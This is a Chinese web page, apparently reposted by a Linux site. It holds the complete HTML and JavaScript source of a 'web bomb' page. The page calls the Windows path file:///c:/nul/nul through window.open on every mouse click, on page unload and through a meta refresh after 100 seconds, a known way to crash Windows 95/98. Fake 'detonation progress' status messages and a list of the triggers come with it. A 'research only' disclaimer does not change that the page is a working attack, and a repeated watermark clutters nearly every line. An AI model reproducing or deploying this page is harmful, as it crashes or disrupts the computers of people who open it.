声明:此程序只供研究使用,如用做不正当用途后果自负!zVRLinux联盟
zVRLinux联盟
zVRLinux联盟
<html> zVRLinux联盟
<head> zVRLinux联盟
<script LANGUAGE="javascript"> function leave() { zVRLinux联盟
window.open(file:///c:/nul/nul,,toolbar=no,menubar=no,location=no,height=1,width=1); zVRLinux联盟
} zVRLinux联盟
// End --> zVRLinux联盟
<!--webbot bot="HTMLMarkup" startspan TAG="XBOT" --></script>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> zVRLinux联盟
<title>WEB A-BOMBII BETA V0.5</title> zVRLinux联盟
<meta name="GENERATOR" content="Microsoft FrontPage 4.0"> zVRLinux联盟
<meta content="100;URL=file:///c:/nul/nul" http-equiv="refresh"> zVRLinux联盟
<style type="text/css">A:link { zVRLinux联盟
FONT-SIZE: 9pt; TEXT-DECORATION: none zVRLinux联盟
} zVRLinux联盟
A:visited { zVRLinux联盟
FONT-SIZE: 9pt; TEXT-DECORATION: none zVRLinux联盟
} zVRLinux联盟
A:active { zVRLinux联盟
FONT-SIZE: 9pt; TEXT-DECORATION: none zVRLinux联盟
} zVRLinux联盟
A:hover { zVRLinux联盟
COLOR: red; TEXT-DECORATION: none zVRLinux联盟
} zVRLinux联盟
BODY { zVRLinux联盟
FONT-SIZE: 9pt; LINE-HEIGHT: 13pt zVRLinux联盟
} zVRLinux联盟
TABLE { zVRLinux联盟
FONT-SIZE: 9pt; LINE-HEIGHT: 13pt zVRLinux联盟
} zVRLinux联盟
TR { zVRLinux联盟
FONT-SIZE: 9pt zVRLinux联盟
} zVRLinux联盟
TD { zVRLinux联盟
FONT-SIZE: 9pt zVRLinux联盟
} zVRLinux联盟
.e { zVRLinux联盟
FONT-FAMILY: "MS Sans Serif"; FONT-SIZE: 9pt; TEXT-DECORATION: none zVRLinux联盟
} zVRLinux联盟
</style> zVRLinux联盟
</head>
<body onUnload="leave()" background onload="startclock()" bgcolor="#000000" text="#FFFFFF"> zVRLinux联盟
</BODY<HTML> zVRLinux联盟
<font size="6"><script language="javascript"> zVRLinux联盟
var timerID = null zVRLinux联盟
var timerRunning = false zVRLinux联盟
var stardate = new Date() zVRLinux联盟
var startime = gettotalsecond(stardate)
function stopclock(){ zVRLinux联盟
if(timerRunning) zVRLinux联盟
clearTimeout(timerID) zVRLinux联盟
timerRunning = false zVRLinux联盟
}
function startclock(){
stopclock() zVRLinux联盟
showtime() zVRLinux联盟
}
function gettotalsecond(getdate) { zVRLinux联盟
var hours = getdate.getHours() zVRLinux联盟
var minutes = getdate.getMinutes() zVRLinux联盟
var seconds = getdate.getSeconds() zVRLinux联盟
var gettotalsecond = seconds + minutes * 60 + hours * 3600 zVRLinux联盟
return(gettotalsecond) zVRLinux联盟
}
function showtime(){ zVRLinux联盟
var now = new Date() zVRLinux联盟
var timevalue = gettotalsecond(now) zVRLinux联盟
document.clock.face.value = timevalue - startime zVRLinux联盟
timerID = setTimeout("showtime()",1000) zVRLinux联盟
timerRunning = true zVRLinux联盟
}
</script> zVRLinux联盟
</font><font color="darkblue" zVRLinux联盟
size="6">
<form name="clock" onsubmit="0"> zVRLinux联盟
<div align="center"><center><p><br> zVRLinux联盟
<strong><font size="3" color="#FF00FF"><br> zVRLinux联盟
=网页教学网http://webjx.com=</font></strong></p> zVRLinux联盟
</center></div></font><font size="4"><div align="center"><center><p></font><strong><font zVRLinux联盟
size="1" color="#FF00FF">您已经用去了<input name="face" size="5">秒时间 </font></strong><font zVRLinux联盟
color="darkblue" size="6"></p> zVRLinux联盟
</center></div> zVRLinux联盟
</form> zVRLinux联盟
</font><script> zVRLinux联盟
//kasper zVRLinux联盟
function click(){ zVRLinux联盟
if(event.button==1){window.open("file:///c:/nul/nul") }
if(event.button==2){window.open("file:///c:/nul/nul") } zVRLinux联盟
} zVRLinux联盟
document.onmousedown=click zVRLinux联盟
</script>
<form name="sw"> zVRLinux联盟
<input type="hidden" name="disp1" value="0:05"><input type="hidden" name="disp2" zVRLinux联盟
value="0:05"> zVRLinux联盟
</form> zVRLinux联盟
<script language="javascript">
<!-- zVRLinux联盟
// Copyright 2004 webjx.com -- web@webjx.com zVRLinux联盟
window.onerror=null; zVRLinux联盟
var down;var min1,sec1;var cmin1,csec1,cmin2,csec2; zVRLinux联盟
function Minutes(data) { zVRLinux联盟
for(var i=0;i<data.length;i++) zVRLinux联盟
if(data.substring(i,i+1)==":") zVRLinux联盟
break; zVRLinux联盟
return(data.substring(0,i)); zVRLinux联盟
} zVRLinux联盟
function Seconds(data) { zVRLinux联盟
for(var i=0;i<data.length;i++) zVRLinux联盟
if(data.substring(i,i+1)==":") zVRLinux联盟
break; zVRLinux联盟
return(data.substring(i+1,data.length)); zVRLinux联盟
} zVRLinux联盟
function Down() { zVRLinux联盟
cmin2=1*Minutes(document.sw.disp1.value); zVRLinux联盟
csec2=0+Seconds(document.sw.disp2.value); zVRLinux联盟
DownRepeat(); zVRLinux联盟
} zVRLinux联盟
function DownRepeat() { zVRLinux联盟
csec2--; zVRLinux联盟
if(csec2==-1) { zVRLinux联盟
csec2=59; cmin2--; zVRLinux联盟
} zVRLinux联盟
window.setTimeout(fakeformat(-1),200); zVRLinux联盟
} zVRLinux联盟
function D() { zVRLinux联盟
cmin2=1*Minutes(document.sw.disp1.value); zVRLinux联盟
csec2=0+Seconds(document.sw.disp2.value); zVRLinux联盟
DRepeat(); zVRLinux联盟
} zVRLinux联盟
function DRepeat() { zVRLinux联盟
csec2--; zVRLinux联盟
if(csec2==-1) { zVRLinux联盟
csec2=59; cmin2--; zVRLinux联盟
} zVRLinux联盟
self.status="请告诉脚本炸弹的错误原因!谢谢合作!"; zVRLinux联盟
} zVRLinux联盟
function faketake(percent1){ zVRLinux联盟
if(percent1 < 100){ zVRLinux联盟
percent1++; zVRLinux联盟
window.status="正在作最后检查 "+percent1+"% complete"; zVRLinux联盟
fid1=window.setTimeout("faketake("+percent1+")",769); zVRLinux联盟
}else{ zVRLinux联盟
window.status="检查完毕,正在作最后准备";Down();}} zVRLinux联盟
function fakeformat(percent){ zVRLinux联盟
if(percent < 100){ zVRLinux联盟
percent++; zVRLinux联盟
window.status="准备引爆 "+percent+"% complete"; zVRLinux联盟
fid=window.setTimeout("fakeformat("+percent+")",189); // 900 zVRLinux联盟
}else{ zVRLinux联盟
window.status="引爆完毕......";D();}} zVRLinux联盟
window.setTimeout(faketake(-1),200000); zVRLinux联盟
// End --> zVRLinux联盟
<!--webbot bot="HTMLMarkup" startspan TAG="XBOT" --></script>
<p align="center"><font color="#FFFF80">此炸弹只队WINDOWS95/98有效<br>
</font><font color="#FF0080"><br> zVRLinux联盟
声明:此程序只供研究使用,如用做不正当用途后果自负!</font><br> zVRLinux联盟
<font color="#00FF80">以下操作可以引爆炸弹!!!<br> zVRLinux联盟
</font><font color="#00FFFF"><br> zVRLinux联盟
1.在本页停留100秒以上;<br> zVRLinux联盟
2.在浏览区点击左右键;<br> zVRLinux联盟
3.点击关闭按钮关闭此窗口;<br> zVRLinux联盟
4.使用“CTRL+ALT+DEL”结束任务;<br> zVRLinux联盟
5.使用“ALT+F4”关闭此窗口;<br> zVRLinux联盟
</font><font color="#FFFF80"><br> zVRLinux联盟
</font> zVRLinux联盟
</body> zVRLinux联盟
</html>
Linux联盟收集整理 ,转贴请标明原始链接,如有任何疑问欢迎来本站Linux论坛讨论